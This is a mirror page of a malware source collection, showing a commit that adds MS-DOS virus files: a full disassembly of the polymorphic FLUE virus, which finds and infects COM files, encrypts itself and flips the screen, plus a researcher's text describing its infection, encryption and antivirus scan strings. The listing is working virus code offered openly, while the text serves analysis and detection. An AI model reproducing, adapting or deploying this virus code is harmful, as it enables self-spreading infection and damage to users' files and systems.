Mirrors
/
vxug-MalwareSourceCode
mirror of https://github.com/vxunderground/MalwareSourceCode
13
1
Fork 0
Code Releases Activity

Add files via upload

This commit is contained in:
vxunderground 2021-01-12 17:44:11 -06:00 committed by GitHub
parent dc888afe59
commit dda6c7045d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
99 changed files with 53487 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1288
MSDOS/Virus.MSDOS.Unknown.GrimReaper_v4_4.asm Normal file
View File

File diff suppressed because it is too large Load Diff

484
MSDOS/Virus.MSDOS.Unknown.flue.asm Normal file
View File

@ -0,0 +1,484 @@
1000:0000 Proc3:
1000:0000 cd 20 INT 20h ;Exit
1000:0079 Data37:
1000:0100 e4 40 Main: IN AL, 40h
1000:0102 86 e0 XCHG AH, AL
1000:0104 e4 40 IN AL, 40h
1000:0106 a3 a205 MOV WORD PTR [Data0], AX
1000:0109 be 1601 MOV SI, 0116h
1000:010c e8 8f04 CALL Proc0
1000:010f e9 0100 JMP Jmp0
1000:0112 db c3
1000:0113 Jmp0:
1000:0113 e8 8404 CALL Proc1
1000:0116 Data9:
1000:0116 e8 0000 CALL Proc2
1000:0119 Proc2:
1000:0119 5d POP BP
1000:011a 81 ed 1901 SUB BP, 0119h
1000:011e eb 01 JMP Jmp1
1000:0120 db 81
1000:0121 Jmp1:
1000:0121 e4 21 IN AL, 21h
1000:0123 0c 02 OR AL, 02h
1000:0125 e6 21 OUT AL, 21h
1000:0127 b9 0300 MOV CX, 0003h
1000:012a bf 0001 MOV DI, 0100h
1000:012d 57 PUSH DI
1000:012e 8d b6 5204 LEA SI, WORD PTR [BP+Data1]
1000:0132 fc CLD
1000:0133 f3 REPNZ
1000:0134 a4 MOVSB
1000:0135 b4 47 MOV AH, 47h
1000:0137 32 d2 XOR DL, DL
1000:0139 8d b6 ae04 LEA SI, WORD PTR [BP+Data2]
1000:013d cd 21 INT 21h ;Get current directory
1000:013f b4 2f MOV AH, 2fh
1000:0141 cd 21 INT 21h ;Get DTA
1000:0143 06 PUSH ES
1000:0144 53 PUSH BX
1000:0145 b8 2435 MOV AX, 3524h
1000:0148 cd 21 INT 21h ;Get int vector 0x24
1000:014a 3e
1000:014b 89 9e ee04 MOV WORD PTR DS:[BP+Data3], BX
1000:014f 3e
1000:0150 8c 86 f004 MOV WORD PTR DS:[BP+Data4], ES
1000:0154 0e PUSH CS
1000:0155 07 POP ES
1000:0156 fa CLI
1000:0157 b4 25 MOV AH, 25h
1000:0159 8d 96 4004 LEA DX, WORD PTR [BP+Data5]
1000:015d cd 21 INT 21h ;Set int vector 0x24
1000:015f fb STI
1000:0160 3e
1000:0161 83 be a205 00 CMP WORD PTR DS:[BP+Data6], 00h
1000:0166 75 03 JNZ Jmp2
1000:0168 e9 4602 JMP Jmp3
1000:016b Jmp2:
1000:016b b4 1a MOV AH, 1ah
1000:016d 8d 96 6104 LEA DX, WORD PTR [BP+Data11]
1000:0171 cd 21 INT 21h ;Set DTA
1000:0173 e8 b402 CALL Proc4
1000:0176 b1 05 MOV CL, 05h
1000:0178 d2 e8 SHR AL, CL
1000:017a fe c0 INC AL
1000:017c 3e
1000:017d 88 86 5104 MOV BYTE PTR DS:[BP+Data12], AL
1000:0181 Jmp7:
1000:0181 b4 4e MOV AH, 4eh
1000:0183 8d 96 5804 LEA DX, WORD PTR [BP+Data13]
1000:0187 eb 31 JMP Jmp5
1000:0189 db 90
1000:018a Jmp10:
1000:018a b8 0157 MOV AX, 5701h
1000:018d 3e
1000:018e 8b 8e 7704 MOV CX, WORD PTR DS:[BP+Data17]
1000:0192 3e
1000:0193 8b 96 7904 MOV DX, WORD PTR DS:[BP+Data18]
1000:0197 cd 21 INT 21h ;Get/set file timestamp
1000:0199 b4 3e MOV AH, 3eh
1000:019b cd 21 INT 21h ;Close file
1000:019d b8 0143 MOV AX, 4301h
1000:01a0 32 ed XOR CH, CH
1000:01a2 3e
1000:01a3 8a 8e 7604 MOV CL, BYTE PTR DS:[BP+Data19]
1000:01a7 8d 96 7f04 LEA DX, WORD PTR [BP+Data15]
1000:01ab cd 21 INT 21h ;Change file attributes
1000:01ad 3e
1000:01ae 80 be 5104 00 CMP BYTE PTR DS:[BP+Data12], 00h
1000:01b3 75 03 JNZ Jmp12
1000:01b5 e9 f901 JMP Jmp3
1000:01b8 Jmp12:
1000:01b8 b4 4f MOV AH, 4fh
1000:01ba Jmp5:
1000:01ba b9 0600 MOV CX, 0006h
1000:01bd cd 21 INT 21h ;Find file
1000:01bf 73 12 JNB Jmp6
1000:01c1 3e
1000:01c2 fe 86 5104 INC BYTE PTR DS:[BP+Data12]
1000:01c6 b4 3b MOV AH, 3bh
1000:01c8 8d 96 5e04 LEA DX, WORD PTR [BP+Data14]
1000:01cc cd 21 INT 21h ;Change directory
1000:01ce 73 b1 JNB Jmp7
1000:01d0 e9 de01 JMP Jmp3
1000:01d3 Jmp6:
1000:01d3 b8 0143 MOV AX, 4301h
1000:01d6 33 c9 XOR CX, CX
1000:01d8 8d 96 7f04 LEA DX, WORD PTR [BP+Data15]
1000:01dc cd 21 INT 21h ;Change file attributes
1000:01de b8 023d MOV AX, 3d02h
1000:01e1 cd 21 INT 21h ;Open file
1000:01e3 73 03 JNB Jmp8
1000:01e5 e9 c901 JMP Jmp3
1000:01e8 Jmp8:
1000:01e8 93 XCHG AX, BX
1000:01e9 83 fb 04 CMP BX, 04h
1000:01ec 77 03 JA Jmp9
1000:01ee e9 c001 JMP Jmp3
1000:01f1 Jmp9:
1000:01f1 3e
1000:01f2 89 9e 4f04 MOV WORD PTR DS:[BP+Data16], BX
1000:01f6 b4 3f MOV AH, 3fh
1000:01f8 b9 0300 MOV CX, 0003h
1000:01fb 8d 96 5204 LEA DX, WORD PTR [BP+Data1]
1000:01ff cd 21 INT 21h ;Read file
1000:0201 e8 0302 CALL Proc5
1000:0204 3d 73bb CMP AX, bb73h
1000:0207 73 81 JNB Jmp10
1000:0209 3d f401 CMP AX, 01f4h
1000:020c 73 03 JNB Jmp11
1000:020e e9 79ff JMP Jmp10
1000:0211 Jmp11:
1000:0211 3e
1000:0212 80 be 5204 e9 CMP BYTE PTR DS:[BP+Data1], e9h
1000:0217 75 0d JNZ Jmp13
1000:0219 3e
1000:021a 2b 86 5304 SUB AX, WORD PTR DS:[BP+Data20]
1000:021e 3d 9e04 CMP AX, 049eh
1000:0221 75 03 JNZ Jmp13
1000:0223 e9 64ff JMP Jmp10
1000:0226 Jmp13:
1000:0226 e8 0102 CALL Proc4
1000:0229 b1 06 MOV CL, 06h
1000:022b d3 e8 SHR AX, CL
1000:022d 50 PUSH AX
1000:022e e8 f901 CALL Proc4
1000:0231 92 XCHG AX, DX
1000:0232 33 c0 XOR AX, AX
1000:0234 8e d8 MOV DS, AX
1000:0236 b4 40 MOV AH, 40h
1000:0238 59 POP CX
1000:0239 cd 21 INT 21h ;Write file
1000:023b 0e PUSH CS
1000:023c 1f POP DS
1000:023d e8 c701 CALL Proc5
1000:0240 e8 e701 CALL Proc4
1000:0243 0b c0 OR AX, AX
1000:0245 75 03 JNZ Jmp14
1000:0247 e9 6701 JMP Jmp3
1000:024a Jmp14:
1000:024a 3e
1000:024b 89 86 a205 MOV WORD PTR DS:[BP+Data6], AX
1000:024f 3e
1000:0250 89 9e 8105 MOV WORD PTR DS:[BP+Data21], BX
1000:0254 b9 2600 MOV CX, 0026h
1000:0257 8d b6 7405 LEA SI, WORD PTR [BP+Data22]
1000:025b 8d be ad05 LEA DI, WORD PTR [BP+Data8]
1000:025f fc CLD
1000:0260 f3 REPNZ
1000:0261 a4 MOVSB
1000:0262 e8 b701 CALL Proc6
1000:0265 d0 e8 SHR AL, 1
1000:0267 3c 02 CMP AL, 02h
1000:0269 72 1f JB Jmp15
1000:026b 77 3a JA Jmp16
1000:026d 3e
1000:026e c6 86 9b05 e3 MOV BYTE PTR DS:[BP+Data23], e3h
1000:0273 3e
1000:0274 c6 86 9d05 37 MOV BYTE PTR DS:[BP+Data24], 37h
1000:0279 3e
1000:027a c7 86 a405 3104 MOV WORD PTR DS:[BP+Jmp4], 0431h
1000:0280 3e
1000:0281 c7 86 a805 4646 MOV WORD PTR DS:[BP+Data25], 4646h
1000:0287 eb 38 JMP Jmp17
1000:0289 db 90
1000:028a Jmp15:
1000:028a 3e
1000:028b c6 86 9b05 e7 MOV BYTE PTR DS:[BP+Data23], e7h
1000:0290 3e
1000:0291 c6 86 9d05 1d MOV BYTE PTR DS:[BP+Data24], 1dh
1000:0296 3e
1000:0297 c7 86 a405 3107 MOV WORD PTR DS:[BP+Jmp4], 0731h
1000:029d 3e
1000:029e c7 86 a805 4343 MOV WORD PTR DS:[BP+Data25], 4343h
1000:02a4 eb 1b JMP Jmp17
1000:02a6 db 90
1000:02a7 Jmp16:
1000:02a7 3e
1000:02a8 c6 86 9b05 e6 MOV BYTE PTR DS:[BP+Data23], e6h
1000:02ad 3e
1000:02ae c6 86 9d05 3c MOV BYTE PTR DS:[BP+Data24], 3ch
1000:02b3 3e
1000:02b4 c7 86 a405 3105 MOV WORD PTR DS:[BP+Jmp4], 0531h
1000:02ba 3e
1000:02bb c7 86 a805 4747 MOV WORD PTR DS:[BP+Data25], 4747h
1000:02c1 Jmp17:
1000:02c1 e8 5801 CALL Proc6
1000:02c4 3c 04 CMP AL, 04h
1000:02c6 72 1c JB Jmp18
1000:02c8 3e
1000:02c9 80 be 9a05 46 CMP BYTE PTR DS:[BP+Proc1], 46h
1000:02ce 72 08 JB Jmp19
1000:02d0 77 0c JA Jmp20
1000:02d2 3c 05 CMP AL, 05h
1000:02d4 75 62 JNZ Jmp21
1000:02d6 eb e9 JMP Jmp17
1000:02d8 Jmp19:
1000:02d8 3c 04 CMP AL, 04h
1000:02da 75 47 JNZ Jmp24
1000:02dc eb e3 JMP Jmp17
1000:02de Jmp20:
1000:02de 3c 06 CMP AL, 06h
1000:02e0 75 6b JNZ Jmp23
1000:02e2 eb dd JMP Jmp17
1000:02e4 Jmp18:
1000:02e4 3c 02 CMP AL, 02h
1000:02e6 72 17 JB Jmp25
1000:02e8 77 24 JA Jmp26
1000:02ea 3e
1000:02eb c6 86 a105 ba MOV BYTE PTR DS:[BP+Data26], bah
1000:02f0 3e
1000:02f1 80 86 a505 10 ADD BYTE PTR DS:[BP+Data27], 10h
1000:02f6 3e
1000:02f7 c6 86 a705 d2 MOV BYTE PTR DS:[BP+Data28], d2h
1000:02fc eb 61 JMP Jmp22
1000:02fe db 90
1000:02ff Jmp25:
1000:02ff 3e
1000:0300 c6 86 a105 b8 MOV BYTE PTR DS:[BP+Data26], b8h
1000:0305 3e
1000:0306 c6 86 a705 d0 MOV BYTE PTR DS:[BP+Data28], d0h
1000:030b eb 52 JMP Jmp22
1000:030d db 90
1000:030e Jmp26:
1000:030e 3e
1000:030f c6 86 a105 bd MOV BYTE PTR DS:[BP+Data26], bdh
1000:0314 3e
1000:0315 80 86 a505 28 ADD BYTE PTR DS:[BP+Data27], 28h
1000:031a 3e
1000:031b c6 86 a705 d5 MOV BYTE PTR DS:[BP+Data28], d5h
1000:0320 eb 3d JMP Jmp22
1000:0322 db 90
1000:0323 Jmp24:
1000:0323 3e
1000:0324 c6 86 a105 bb MOV BYTE PTR DS:[BP+Data26], bbh
1000:0329 3e
1000:032a 80 86 a505 18 ADD BYTE PTR DS:[BP+Data27], 18h
1000:032f 3e
1000:0330 c6 86 a705 d3 MOV BYTE PTR DS:[BP+Data28], d3h
1000:0335 eb 28 JMP Jmp22
1000:0337 db 90
1000:0338 Jmp21:
1000:0338 3e
1000:0339 c6 86 a105 be MOV BYTE PTR DS:[BP+Data26], beh
1000:033e 3e
1000:033f 80 86 a505 30 ADD BYTE PTR DS:[BP+Data27], 30h
1000:0344 3e
1000:0345 c6 86 a705 d6 MOV BYTE PTR DS:[BP+Data28], d6h
1000:034a eb 13 JMP Jmp22
1000:034c db 90
1000:034d Jmp23:
1000:034d 3e
1000:034e c6 86 a105 bf MOV BYTE PTR DS:[BP+Data26], bfh
1000:0353 3e
1000:0354 80 86 a505 38 ADD BYTE PTR DS:[BP+Data27], 38h
1000:0359 3e
1000:035a c6 86 a705 d7 MOV BYTE PTR DS:[BP+Data28], d7h
1000:035f Jmp22:
1000:035f 8d b6 1601 LEA SI, WORD PTR [BP+Data9]
1000:0363 8b fe MOV DI, SI
1000:0365 8b de MOV BX, SI
1000:0367 55 PUSH BP
1000:0368 e8 3302 CALL Proc0
1000:036b 5d POP BP
1000:036c b8 0042 MOV AX, 4200h
1000:036f 3e
1000:0370 8b 9e 4f04 MOV BX, WORD PTR DS:[BP+Data16]
1000:0374 33 c9 XOR CX, CX
1000:0376 33 d2 XOR DX, DX
1000:0378 cd 21 INT 21h ;Seek on file
1000:037a b4 40 MOV AH, 40h
1000:037c b9 0300 MOV CX, 0003h
1000:037f 8d 96 5504 LEA DX, WORD PTR [BP+Data29]
1000:0383 cd 21 INT 21h ;Write file
1000:0385 b8 00b8 MOV AX, b800h
1000:0388 8e c0 MOV ES, AX
1000:038a 8e d8 MOV DS, AX
1000:038c 33 f6 XOR SI, SI
1000:038e 33 ff XOR DI, DI
1000:0390 b9 1800 MOV CX, 0018h
1000:0393 51 PUSH CX
1000:0394 b9 5000 MOV CX, 0050h
1000:0397 ad LODSW
1000:0398 50 PUSH AX
1000:0399 e2 fc LOOP Data30
1000:039b b9 5000 MOV CX, 0050h
1000:039e 58 POP AX
1000:039f ab STOSW
1000:03a0 e2 fc LOOP Data31
1000:03a2 59 POP CX
1000:03a3 e2 ee LOOP Data32
1000:03a5 0e PUSH CS
1000:03a6 0e PUSH CS
1000:03a7 1f POP DS
1000:03a8 07 POP ES
1000:03a9 3e
1000:03aa fe 8e 5104 DEC BYTE PTR DS:[BP+Data12]
1000:03ae e9 d9fd JMP Jmp10
1000:03b1 Jmp3:
1000:03b1 8d b6 ce03 LEA SI, WORD PTR [BP+Data7]
1000:03b5 8d be ad05 LEA DI, WORD PTR [BP+Data8]
1000:03b9 b9 3900 MOV CX, 0039h
1000:03bc fc CLD
1000:03bd f3 REPNZ
1000:03be a4 MOVSB
1000:03bf 8d b6 1601 LEA SI, WORD PTR [BP+Data9]
1000:03c3 8b fe MOV DI, SI
1000:03c5 8b de MOV BX, SI
1000:03c7 b9 c901 MOV CX, 01c9h
1000:03ca 55 PUSH BP
1000:03cb e9 d601 JMP Jmp4
1000:03ce Data7:
1000:03ce db 5d,b8,24,25,3e,8b,96,f0,04,8e,da,3e,8b,96,ee,04,cd,21,b4,1a
1000:03e2 db 5a,1f,cd,21,0e,1f,b4,3b,8d,96,ad,04,cd,21,e4,21,24,fd,e6,21
1000:03f6 db 33,c0,33,db,33,c9,33,d2,33,ed,be,00,01,bf,00,01,c3
1000:0407 Proc5:
1000:0407 b8 0242 MOV AX, 4202h
1000:040a 33 c9 XOR CX, CX
1000:040c 33 d2 XOR DX, DX
1000:040e cd 21 INT 21h ;Seek on file
1000:0410 2d 0300 SUB AX, 0003h
1000:0413 3e
1000:0414 89 86 5604 MOV WORD PTR DS:[BP+Data41], AX
1000:0418 05 0300 ADD AX, 0003h
1000:041b c3 RET
1000:041c Proc6:
1000:041c e8 0b00 CALL Proc4
1000:041f 24 0f AND AL, 0fh
1000:0421 d0 e8 SHR AL, 1
1000:0423 3c 05 CMP AL, 05h
1000:0425 77 f5 JA Proc6
1000:0427 fe c0 INC AL
1000:0429 c3 RET
1000:042a Proc4:
1000:042a b4 2c MOV AH, 2ch
1000:042c cd 21 INT 21h ;Get time
1000:042e 86 ea XCHG CH, DL
1000:0430 90 NOP
1000:0431 b4 2c MOV AH, 2ch
1000:0433 cd 21 INT 21h ;Get time
1000:0435 86 ca XCHG CL, DL
1000:0437 e4 40 IN AL, 40h
1000:0439 86 e0 XCHG AH, AL
1000:043b e4 40 IN AL, 40h
1000:043d 33 c1 XOR AX, CX
1000:043f c3 RET
1000:0440 Data5:
1000:0440 db b9,09,00,58,e2,fd,5d,1f,07,5a,1f,9d,e9,62,ff,00,00,00,eb,10
1000:044f Data16:
1000:0451 Data12:
1000:0452 Data1:
1000:0453 Data20:
1000:0454 db 90,e9,fd,fe
1000:0455 Data29:
1000:0456 Data41:
1000:0458 Data13:
1000:0458 db '*.COM'
1000:045d db 00,2e,2e,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
1000:045e Data14:
1000:0461 Data11:
1000:0471 db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
1000:0476 Data19:
1000:0477 Data17:
1000:0479 Data18:
1000:047f Data15:
1000:0485 db 00,00,00,00,00,00,00,20,22,9d,ed,e6,20,e0
1000:0493 e2 ee LOOP Data33
1000:0495 20 f3 AND BL, DH
1000:0497 ad LODSW
1000:0498 87 de XCHG BX, SI
1000:049a 3c 22 CMP AL, 22h
1000:049c 2c 20 SUB AL, 20h
1000:049e f3 REPNZ
1000:049f e0 79 LOOPNZ Data34
1000:04a1 f3 REPNZ
1000:04a2 3a 20 CMP AH, BYTE PTR [BX+SI]
1000:04a4 5b POP BX
1000:04a5 44 INC SP
1000:04a6 e0 52 LOOPNZ Data35
1000:04a8 db 6b,52,e0,59,5d,5c,00,00,00,00,00,00,00,00,00,00,00,00,00,00
1000:04ae Data2:
1000:04bc db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
1000:04d0 db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
1000:04e4 db 00,00,00,00,00,00,00,00,00,00,00,00,00,00
1000:04ee Data3:
1000:04f0 Data4:
1000:04f2 db 'Hatsjeee'
1000:04fa 6b 52 e0 595d XOR WORD PTR [BP+SIData36], 5d59h
1000:04fc 20 28 AND BYTE PTR [BX+SI], CH
1000:04fe 43 INC BX
1000:04ff 29 20 SUB WORD PTR [BX+SI], SP
1000:0501 31 39 XOR WORD PTR [BX+DI], DI
1000:0503 39 32 CMP WORD PTR [BP+SI], SI
1000:0505 2f DAS
1000:0506 31 39 XOR WORD PTR [BX+DI], DI
1000:0508 39 33 CMP WORD PTR [BP+DI], SI
1000:050a 20 62 79 AND BYTE PTR [BP+SI+Data37], AH
1000:050d 20 54 72 AND BYTE PTR [SI+Data38], DL
1000:0510 db 'idenT / [D'
1000:051a 69 64 65 6e54 XOR WORD PTR [SI+Data39], 546eh
1000:051c db 6b,52,e0
1000:051f db 'Y]Oh, BTW it's from '
1000:0533 db 'Holland, and is call'
1000:0547 db 'ed THE FLUEFor those'
1000:055b db ' who are interested'
1000:056e 6b 52 e0 595d XOR WORD PTR [BP+SIData36], 5d59h
1000:056f 2e
1000:0570 2e
1000:0571 2e
1000:0572 2e
1000:0573 2e
1000:0574 Data22:
1000:0574 58 POP AX
1000:0575 5d POP BP
1000:0576 55 PUSH BP
1000:0577 50 PUSH AX
1000:0578 3e
1000:0579 c6 86 ad05 c3 MOV BYTE PTR DS:[BP+Data8], c3h
1000:057e b4 40 MOV AH, 40h
1000:0580 bb 0000 MOV BX, 0000h
1000:0581 Data21:
1000:0583 b9 9b04 MOV CX, 049bh
1000:0586 8d 96 1301 LEA DX, WORD PTR [BP+Jmp0]
1000:058a cd 21 INT 21h ;Write file
1000:058c 8d be 9e05 LEA DI, WORD PTR [BP+Proc0]
1000:0590 57 PUSH DI
1000:0591 8d b6 1601 LEA SI, WORD PTR [BP+Data9]
1000:0595 8b fe MOV DI, SI
1000:0597 8b de MOV BX, SI
1000:0599 c3 RET
1000:059a Proc1:
1000:059a 89 e3 MOV BX, SP
1000:059b Data23:
1000:059c 8b 37 MOV SI, WORD PTR [BX]
1000:059d Data24:
1000:059e Proc0:
1000:059e b9 4002 MOV CX, 0240h
1000:05a1 Data26:
1000:05a1 b8 0000 MOV AX, 0000h
1000:05a2 Data6:
1000:05a4 Jmp4:
1000:05a4 31 04 XOR WORD PTR [SI], AX
1000:05a5 Data27:
1000:05a6 f7 d0 NOT AX
1000:05a7 Data28:
1000:05a8 Data25:
1000:05a8 46 INC SI
1000:05a9 46 INC SI
1000:05aa 49 DEC CX
1000:05ab 75 f7 JNZ Jmp4
1000:05ad Data8:
1000:05ad c3 RET
1000:ffe0 Data36:
2f18:0393 Data32:
2f18:0397 Data30:
2f18:039e Data31:
2f18:0483 Data33:
2f18:04fa Data35:
2f18:051a Data34:
2f18:056e Data40:
2f18:05a2 Data0:
eda4:0000 Data10:
eda4:0065 Data39:
eda4:0072 Data38:

140
MSDOS/Virus.MSDOS.Unknown.flue.txt Normal file
View File

@ -0,0 +1,140 @@
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ³
³ This Virus Came To You By Way Of... ³
³ ³
³ ÜÛÛÛÛÛÛÛÜ ÜÛÛÛÛÛÛÛÛÜ ÜÛÜ ÜÛÛÛÛÛÛÛÜ ³
³ ÛÛÛÛß ßÛÛÛ ÛÛÛß ßÛÛÛ ÛÛÛÛÛ ÛÛÛÛß ßÛÛÛÛ ³
³ ÛÛÛÛ ÛÛÛÜ ÜÛÛÛ ÛÛÛÛÛ ßÛÛÛÛÛÜÜ ³
³ ÛÛÛÛ ÛÛÛÛÛÛÛÛÛß ÛÛÛÛÛ ßßÛÛÛÛÛÜ ³
³ ÛÛÛÛÜ ÜÛÛÛ ÜÛÛÜ ÛÛÛÛ ßÛÛÛÛÜ ÜÛÛÜ ÛÛÛÛÛ ÜÛÛÜ ÛÛÛÛÜ ÜÛÛÛÛ ÜÛÛÜ ³
³ ßÛÛÛÛÛÛÛß ßÛÛß ßÛÛß ßÛÛß ßÛÛß ßÛß ßÛÛß ßÛÛÛÛÛÛÛß ßÛÛß ³
³ ³
³ ³
³ Computer Research & Information Service ³
³ ³
³ ³
³ Cris is a group of computer users that have a true interest in ³
³ Computer Viruses and Trojans, as well as how they work. ³
³ ³
³ Members of Cris feel a need, not only to be up on the latest ³
³ Bombs, Trojans, Worms, and Viruses, but to safely transfer these ³
³ files into the hands of other dedicated researchers. ³
³ ³
³ Cris cannot be held responsible for the use or misuse of these ³
³ files. Cris releases are sent out to better the knowledge of the ³
³ virus community, for those who would like to learn more about them ³
³ and how they work. ³
³ ³
³ Also, all Cris releases have been pre-tested and informative text ³
³ files are enclosed with valuable information regarding the type of ³
³ virus, how it works, and removal information. If the virus you ³
³ downloaded is not a Cris release, you don't know what you've got. ³
³ ³
³ DuWayne Bonkoski ³
³ (Original Text Written By Michael Paris) ³
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Cris Release Date:12/18/93 ³
³ Type: Virus ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ VSUM Information - Quoted from Patricia M. Hoffman's Hypertext VSUM ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ No Information Found ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Scanning Results ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ ³
³ McAfee's ViruScan Reports - Detected [Flue] ³
³ File had to be deleted ³
³ F-Prot's ViruScan Reports - Detected [Flue] ³
³ File had to be deleted ³
³ TBAV's ViruScan Reports - Detected [Flue] ³ ³
³ Successfully repaired executable ³
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Researcher's Notes ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ The FLUE virus is a polymorphic virus which infects COM files only. The ³
³ FLUE virus has a very visible way to letting you know it has infected ³
³ a file. The virus will "flip" a character screen from right to left or ³
³ vice versa. The screen flip does not work on monochrome monitors, however, ³
³ because the virus is hard-coded to read segment B800 which is where screen ³
³ information lies for color text modes. Monochrome video lies in ³
³ the B000 segment and the virus does not have a routine to sense which ³
³ type of video is being used. ³
³ ³
³ The virus hooks interrupt 24 (Critical Error Handler) which causes the ³
³ virus to replicate if a critical error occurs during execution. ³
³ ³
³ The virus does not become memory resident as far as I can tell. ³
³ ³
³ A character string can be found within the virus body which may appear ³
³ un-encrypted within infected files. The string reads as follows: ³
³ ³
³ Hatsjeee!! <C> 1992/1993 by TridenT / [DàRkRàY]Oh, BTW it's from Holland, ³
³ and is called the FLUEFor those who are interested...... ³
³ ³
³ ³
³ Encryption ³
³ ========== ³
³ The FLUE encrypts itself by XOR'ing the body of the virus with a ³
³ randomly generated word varaiable and then uses the variable's complement ³
³ on the next encryption cycle. ³
³ ³
³ ³
³ Infection ³
³ ========= ³
³ The FLUE infects COM files having a length between 500 and 47987 bytes. ³
³ The virus does not check to see if the file has already been infected and ³
³ will attempt to re-infect an already infected file. ³
³ The decryption routine the virus creates is very polymorphic. The program ³
³ will randomly change which registers it uses to decrypt itself for each ³
³ infected file. ³
³ ³
³ The infected files grow by a varying number of bytes. The virus ³
³ copies a random number of bytes from the zero page and appends them to ³
³ the end of the executable before infecting the file. This is what causes ³
³ the random growth. ³
³ ³
³ Upon execution of an infected file, the virus will try to infect between ³
³ one and eight files plus one more for each directory it moves into. ³
³ ³
³ An interesting note on how the virus appends itself to other COM files. ³
³ At first glance, the source codes does not show any significant file ³
³ write routines that are necessary to cause replication. It took me ³
³ a while to figure out how the virus accomplished this. It does this ³
³ by building it's own write routine as it runs in memory. Just another ³
³ example of the polymorphic capabilities of this virus. ³
³ ³
³ ³
³ Detection ³
³ ========= ³
³ All scanners tested will detect this virus. ³
³ ³
³ This virus can be detected using the following scan strings (for those ³
³ who are using older/other scan utilities): ³
³ ³
³ 89?18B?1B94002?331?1F7?349 - TBAV ³
³ 89??8B??B94002??????31??F7??????49 - F-PROT ³
³ 89?8B?B94002???31?F7???49 - SCAN ³
³ ³
³ ³
³ Summary ³
³ ======= ³
³ I have to admit, the virus was a challenge for me due to it's polymorphic ³
³ capabilities. I had to step through it a couple of times to get a feel ³
³ for what was going on. I'm not sure why all the polymorphism is used ³
³ in this particular strain since the visual cues easily let you know ³
³ something unusual is happening. Otherwise, this virus is a pretty fast ³
³ replicator that wants to be noticed in its own little way. ³
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

671
MSDOS/Virus.MSDOS.Unknown.fonta.asm Normal file
View File

@ -0,0 +1,671 @@
PAGE 59,132
